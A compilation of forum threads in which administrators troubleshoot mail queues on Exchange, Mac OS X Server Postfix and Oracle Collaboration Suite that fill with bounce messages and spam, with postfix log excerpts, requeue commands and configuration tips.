So my Exchange 2010 queue viewer keeps filling up with failed DSNs. There is no sender (except for [email protected]). I have done some searching and the first thing that everyone usually mentions as a cause is SPAM. It's not SPAM. I know this
for two reasons:
1. We have a barracuda SPAM/AV firewall that all SMTP email goes through. None of these emails are there
2. We can see the subject of the email. The subject is a cronjob email from our linux servers. "Undeliverable Cron <cronuser@>..." But there is no source email to be found. Our linux server is not sending any.
Any idea what could be causing this?If they're DSNs, they could be sent from anywhere with a spoofed reply address.
Ed Crowley MVP "There are seldom good technological solutions to behavioral problems." -
Came into the office this morning and everyone is complaining they didn't get any email over the weekend. I log into SA to notice over 300 emails stuck in the queue. I found a couple threads regarding this and this one particularly is almost my exact situation:
http://discussions.apple.com/thread.jspa?messageID=1891076&
With the exception of upgrading the OS. I did actually have to add a virtual IP address to the same NIC that has the IP for our email. I did this because I was having SSL issues:
http://discussions.apple.com/thread.jspa?threadID=612479&tstart=0
Since I wasn't adding a new IP and not so much changing an IP, I didn't use the "changeip" command. Following some of the instructions from the above mentioned thread, I ran "sudo postsuper -r ALL" and this didn't seem to help at all. I then issued a "/sbin/reboot" to restart the email server and now it is in the process of sending all the email that are in the queue. Send and receive email is working properly.
So why the post since I have solved my own problem?
Because it makes me nervous that after adding an additional real-world IP to the extra NIC installed on the server, that it has been behaving this.
So... any thoughts or suggestions on how to prevent this in the future or how to fix this? Thanks.Ahhh! Yes, I did create an actual user for postmaster
and am using it so I could have an additional email
account in Mail.app to monitor email that was
improperly addressed. Usually I find about 1-2
emails a week where someone improperly mis-spelled
someones address and therefore I send it on to the
right place.
Should I delete the "postmaster" account in WGM? But
then how would I be able to check it's email?
Have a look in /etc/postfix/alias. The alias name is on the left (postmaster) and the name of the mail account used for it is on the right. Replace with your own short name or another (I usually set up a separate mailadmin user). But I don't really think that is causing your problem - its the actual receiving undeliverable mail which is generating the bounces back out.
Also in /etc/postfix/main.cf what's the difference
between "myhostname" and "mydomain". I have them
both configured the same with "mail.domain.com".
Should one be "domain.com" and the other
"mail.domain.com"?
myhostname is normally your hostname ( eg mail.domain.com) - what you want your server to use in its 'helo' command. Ideally should be the same as your MX record (and PTR record for your IP). Ideally they should all match but sometimes difficult.
mydomain - eg domain.com
Note that you will have to put the domain into the Local Hosts Alias pane (if not already there) if you previously only had it as your myhostname.
-david -
Mail QUEUE keeps filling up 17000+ emails
I am running a OS 10.4.11 w/latest security updates. Approx 50 active email accounts but a high volume of emails. We have been shut down by our ISP for an open proxy (unsure if this is related or not). We keep getting thousands of emails flooding our mail queue from unknown sources to unknown address. I have read another post with similar issues and I want to update the postfx config to keep this over load of emails from reaching the queue. I am not that great with command line and would like a little help. I have read FRONT-LINE SPAM DEFENSE FOR MAIL SERVERS, and need just a bit of help getting started. ANY help will be appreciated.
Using text wrangler and editing the main.cf file. I am also looking at the logs and here is what I had on the 31st when we got blocked by our ISP, it looks like just a bunch of spam flooding us with malformed names.
Aug 31 09:44:04 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
Aug 31 09:44:04 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yaoo.com:
Aug 31 09:44:05 mail postfix/smtp[3642]: warning: valid_hostname: empty hostname
Aug 31 09:44:05 mail postfix/smtp[3642]: warning: malformed domain name in resource data of MX record for yuahoo.com:
Aug 31 09:44:11 mail postfix/smtp[3699]: warning: valid_hostname: empty hostname
Aug 31 09:44:11 mail postfix/smtp[3699]: warning: malformed domain name in resource data of MX record for yaho.com:
Aug 31 09:44:13 mail postfix/smtp[3706]: warning: valid_hostname: empty hostname
Aug 31 09:44:13 mail postfix/smtp[3706]: warning: malformed domain name in resource data of MX record for yahho.com:
Aug 31 09:44:15 mail postfix/smtp[4167]: warning: valid_hostname: empty hostname
Aug 31 09:44:15 mail postfix/smtp[4167]: warning: malformed domain name in resource data of MX record for yhaoo.com:
Aug 31 09:44:15 mail postfix/smtp[4177]: warning: valid_hostname: empty hostname
Aug 31 09:44:15 mail postfix/smtp[4177]: warning: malformed domain name in resource data of MX record for yhoo.com:
Aug 31 09:44:21 mail postfix/smtp[3670]: warning: valid_hostname: empty hostname
Aug 31 09:44:21 mail postfix/smtp[3670]: warning: malformed domain name in resource data of MX record for ahoo.com:
Aug 31 09:44:21 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
Aug 31 09:44:21 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahho.com:
Aug 31 09:44:30 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
Aug 31 09:44:30 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yahooo.com:
Aug 31 09:44:37 mail postfix/smtp[3669]: warning: valid_hostname: empty hostname
Aug 31 09:44:37 mail postfix/smtp[3669]: warning: malformed domain name in resource data of MX record for yaho.com:
Aug 31 09:44:38 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
Aug 31 09:44:38 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yaho.com:
Aug 31 09:44:39 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
Aug 31 09:44:39 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaoo.com:
Aug 31 09:44:43 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
Aug 31 09:44:43 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yhaoo.com:
Aug 31 09:44:47 mail postfix/smtp[3674]: warning: numeric domain name in resource data of MX record for disinc.com: 127.0.1.50
Aug 31 09:44:49 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
Aug 31 09:44:49 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for ayahoo.com:
Aug 31 09:44:50 mail postfix/smtp[3655]: warning: valid_hostname: empty hostname
Aug 31 09:44:50 mail postfix/smtp[3655]: warning: malformed domain name in resource data of MX record for atyahoo.com:
Aug 31 09:44:51 mail postfix/smtp[1804]: warning: valid_hostname: empty hostname
Aug 31 09:44:51 mail postfix/smtp[1804]: warning: malformed domain name in resource data of MX record for yahoon.net:
Aug 31 09:44:52 mail postfix/smtp[1826]: warning: valid_hostname: empty hostname
Aug 31 09:44:52 mail postfix/smtp[1826]: warning: malformed domain name in resource data of MX record for yaho.com:
Aug 31 09:44:53 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
Aug 31 09:44:53 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yaho.com:
Aug 31 09:44:54 mail postfix/smtp[3701]: warning: valid_hostname: empty hostname
Aug 31 09:44:54 mail postfix/smtp[3701]: warning: malformed domain name in resource data of MX record for yhoo.com:
Aug 31 09:44:56 mail postfix/smtp[4201]: warning: valid_hostname: empty hostname
Aug 31 09:44:56 mail postfix/smtp[4201]: warning: malformed domain name in resource data of MX record for hyahoo.com:
Aug 31 09:44:56 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
Aug 31 09:44:56 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yhoo.com:
Aug 31 09:44:56 mail postfix/smtp[4196]: warning: valid_hostname: empty hostname
Aug 31 09:44:56 mail postfix/smtp[4196]: warning: malformed domain name in resource data of MX record for yahooo.com:
Aug 31 09:44:59 mail postfix/smtp[3646]: warning: valid_hostname: empty hostname
Aug 31 09:44:59 mail postfix/smtp[3646]: warning: malformed domain name in resource data of MX record for yaoo.com:
Aug 31 09:45:00 mail postfix/smtp[4197]: warning: valid_hostname: empty hostname
Aug 31 09:45:00 mail postfix/smtp[4197]: warning: malformed domain name in resource data of MX record for yahho.com:
Aug 31 09:45:14 mail postfix/smtp[3690]: warning: valid_hostname: empty hostname
Aug 31 09:45:14 mail postfix/smtp[3690]: warning: malformed domain name in resource data of MX record for yahoo.net:
Aug 31 09:45:16 mail postfix/smtp[3660]: warning: valid_hostname: empty hostname
Aug 31 09:45:16 mail postfix/smtp[3660]: warning: malformed domain name in resource data of MX record for yhoo.com:
Aug 31 09:45:17 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
Aug 31 09:45:17 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahho.com:
Aug 31 09:45:18 mail postfix/smtp[3645]: warning: valid_hostname: empty hostname
Aug 31 09:45:18 mail postfix/smtp[3645]: warning: malformed domain name in resource data of MX record for yhaoo.com:
Aug 31 09:45:20 mail postfix/smtp[4203]: warning: valid_hostname: empty hostname
Aug 31 09:45:20 mail postfix/smtp[4203]: warning: malformed domain name in resource data of MX record for yahooomail.com:
Aug 31 09:45:20 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
Aug 31 09:45:20 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
Aug 31 09:45:24 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
Aug 31 09:45:24 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yahool.com:
Aug 31 09:45:28 mail postfix/smtp[3649]: warning: valid_hostname: empty hostname
Aug 31 09:45:28 mail postfix/smtp[3649]: warning: malformed domain name in resource data of MX record for yhaoo.com:
Aug 31 09:45:28 mail postfix/smtp[3692]: warning: valid_hostname: empty hostname
Aug 31 09:45:28 mail postfix/smtp[3692]: warning: malformed domain name in resource data of MX record for yahooo.com:
Aug 31 09:45:35 mail postfix/smtp[3651]: warning: valid_hostname: empty hostname
Aug 31 09:45:35 mail postfix/smtp[3651]: warning: malformed domain name in -
Server Admin- Mail queue is this before or after its been checked as spam?
Hi we have been bombarded with shed loads of junk causing the mail queue to swell and slow down considerably almost to a halt. I have now created the junkmail account and the notjunkmail accounts and now trying to teach the server to sort itself out.
However in the queue we have MADEUP [email protected] and Im deleting these manually as i cant mark these as junkmail. Will the server once taught, be able to distinguish between the real users and the made up ones?
Also is what is in the queue is this after the filtering or what will be filtered?
Thanks Hope this makes sense.
Oh and if any one knows any great bolt on gui spam filters for mac server 10.4 id appreciate your advice... ThanksSieve scripting is built in.
Example vacation email script, forwarding and junk-mail processing are included in the Command Line manual.
Some URLs...
http://www.ietf.org/rfc/rfc3028.txt
http://nfs-uxsup.csx.cam.ac.uk/~fanf2/hermes/doc/sieve/
As for Postfix:
http://www.stepwise.com/Articles/Workbench/eart.index.html
http://www.cutedgesystems.com/software/PostfixEnabler/ -
What to do with mail stuck in mail queue?
I think i have my web and e-mail server running fine, all mail from the users is coming and going as should. But I have to delete the mail queue every two days or so because it is filling up with junk mail to unknown senders and users. I think everting is setup correct and I do not have an open relay, but is there some way I can have it delete the junk mail in this queue by itself?
Most likely you have postfix configured to accept any mail. Being for known or unknown users. Thus, mail for unknown users (mostly spam) gets only bounced at a later stage (cyrus/IMAP), which in turn creates those pesky Mailer-Daemon messages in your queue.
Being spam, there is usually no proper return address, so those messages stay in your queue, until they expire after 5 days (default value).
See my tutorial on how to improve Postfix' configuration here: http://osx.topicdesk.com/content/view/38/62/ -
I have installed Collaboration Suite 9.0.3, and am curious to know how to look at the mail queue on the OCS server, and more specifically, how do I delete emails in the queue? Somebody apparently found us during the installation of this server before I could lock it down with spam rules, and I have a ton of junk emails stuck in the queue that won't go anywhere. How do I get rid of those messages? They are literally using up the server resources after about 5 hours of the server trying to send them.
Thanks,
MichaelWell, I guess that's part of the problem too. I'm not sure I have emails in the queue. I have the OCS server set up with the relay host set to another server on the network running sendmail. If I stop the smtp_out service on the OCS server, and then start it again, I see a bunch of messages being sent to the relay server to be delivered, most of them spam as far as I can tell. The sendmail server is set to reject those messages, so it does not try to deliver them and therefore does not put them in the queue on that server. However, regardless of restarting smtp_out, restarting Unified Messaging, restarting OCS, or restarting the entire server, those messages continue to remain in what I'm assuming is the queue on the OCS server. Does that make any sense? From what I can get from the documentation, they must be sitting in the mailstore database somewhere, and I'm wondering if there is a query I can run to at least look and see what is there, and preferable delete them. Otherwise, I guess I have to wait 5 days for the server to finally give up.
Any ideas?
Thanks,
Michael -
Server Admin only shows 201 messages in Mail Queue
This issue has been haunting me since 10.5.0 and I can't seem to get rid of it. It's not crucial, but very obnoxious. In Server Admin (from multiple computers) the mail queue will only show a maximum of 201 messages. If there are more than that I have a cryptic "message" at the end of the list that has a message ID of "FFFFFFFFFFFF" and the Recipients Field has [...]
I would love to be able to see all the messages in my queue if possible, but haven't found anywhere to fix this.
Any help would be very appreciated.Thanks Alex. We aren't bouncing spam on our mail server, but I do notice that a lot of the mail is from MAILER-DAEMON. I'm assuming it's "User not Found" messages from hosts that don't really exist. I've tweaked the server using some suggestions from osx.topicdesk.com to clear some of those out, but it hasn't been 100% effective.
I think part of the issue is that the server is a dual G4 Xserve and is scanning junk mail on all messages. I assume that those two factors contribute to the backup of mail in the queue.
As for volume of mail, we receive 100k a month. -
We lost our internet connection yesterday for over 12 hours. It is back on now and the mailserver is working fine BUT...
a) Nothing has arrived from the time we were out ie: I have everything prior to the lost connection and everything since, but nothing from the lost 12 hours. It is like it never existed!
b) I have a group in emails that are stuck fast in the mailserver queue (Server Admin, Mail, Maintenance, Mail Queue). I can delete some that I know to be spam but when I click 'Retry' nothing happens
Any ideas?
(Server 10.5.2)Open terminal and issue:
sudo postsuper -r ALL
(Give it time and don't force the queue continuously. If it doesn't start sending after a few minutes, check /var/log/mail.log for clues) -
For reasons I have not yet understood, my 10.5.2 mailserver stopped delivering mail. After a few restarts it is now running again but;
All the mail that arrived while it was stopped is now stuck in the Mail Queue. How can I get it to deliver thisstuck mail?pterobyte wrote:
If they can't get to the content filter on the first try, maybe it's overloaded? How busy is your machine?
It's a new installation of Leopard Server on an internal drive, the CPU navigate from 0 to 20% so it's not here. I used spamtrainer to import the database from the old drive (Tiger Server) and the mail store is on a RAID disk so I just had to change the default mail location in the right pane. I just restarted the server on the Tiger Server disk and everything is fine there.
Requeuing does not start the content filter, so if it were off, it'd still be off. So since it is running, it look like it can't keep up.
Sorry, I do my best to be understandable :->
I just made tries to see if mails would be delivered once the spam and virus filter is off and saw that mails were not delivered at all.
Is this the normal behavior ?
This problem of the content filter is probably linked to what I said in another thread.
I cannot uncheck "Attach subject tag" in Server Admin. If I uncheck the spam filter and virus filter then mails are not delivered too.
I doubt it is linked (unless you "play" with Server Admin while troubleshooting the queue). As I mentioned above, amavisd, doesn't run just "a bit".
You can always change the amavisd and postfix settings yourself.
If I knew what to change and where I probably would do it :->
I'm just scared about how many things don't work as expected once Leopard Server is installed.
Lot of problems with SMB too and as we have only one machine here I must reboot the server on Tiger if I don't want everybody here to kill me :->>
Maybe some files cannot be read/write...
If it was a permission issue, requeued mail would still hit the same issues.
Yes... I thought about that.
Do you think that it could help to download the 10.5.2 combo update and to reinstall it ?
Doubt it, but it probably won't hurt.
Will try it as soon as I can reboot the server on Leopard. I seems that someone will not leave the office like others will do today
Thanks for your help. -
Somebody please help me!!!!
I recently realised that the mail server part of OSX server was switched on without being configured correctly and as a result someone was relaying spam through it.
I know virtually nothing about Terminal but have managed to delete the mail.log's which were nearly 1gb and the mailaccess.log but they have started to grow again even though mail is now off!
If i try to view the Mail Queue in server admin it grinds to a halt so i am guessing that i must have a huge backlog of messages in the queue. Is there an easy way of clearing the queue without using server admin?
Thanks,
MarkAfter you take care of the immediate issue....
I would try and find out how the mail server was enabled.
You could have an intruder who is using your machine for their own prupose.
Do you have port 22 (SSH) open to the outside world?
You might want to check your logs, especially /var/log/secure.log
Jeff
Maybe you are looking for
-
I am having trouble staying connected to air play with Apple TV even though my device is still connected to the internet and playing.
-
MacBook Pro Cost/Benefit to repair old, or sell and buy new?!
I have used a Apple MacBook Pro 2.0GHz Intel Core Duo (15.4-inch) for the past four years of college. In that time I've had it repaired once for some spillage, but other than that nothing has been done. The laptop has recently been showing serious ag
-
How to make new stationary in Mail
Hi there. I am trying to make a new mail template to send out some company info. I understand the principal of creating an email then >save as Stationary but I can only put images left center or right. I would like to create something close to t
-
..the strange case of radio fm and bluetooth speak...
Hi everyone, I've just bought a bluetooth speaker ("Supertooth disco") and I successfully connected it to my Nokia N79. It works fine with music stored in my mobile, but I can't get it work with radio fm. Obviusly I know that earphones are needed: I
-
CS6 takes my After Effects clips offline.
Hello, I'm running a Mac Pro 5,1 with 32 gigs of memory and an Nvidia Quadro 4000. I have a timeline contaning nothing but After Effects compositions that reside in three or four different AE project files. All were imported into AE CS6 from CS5.5 (i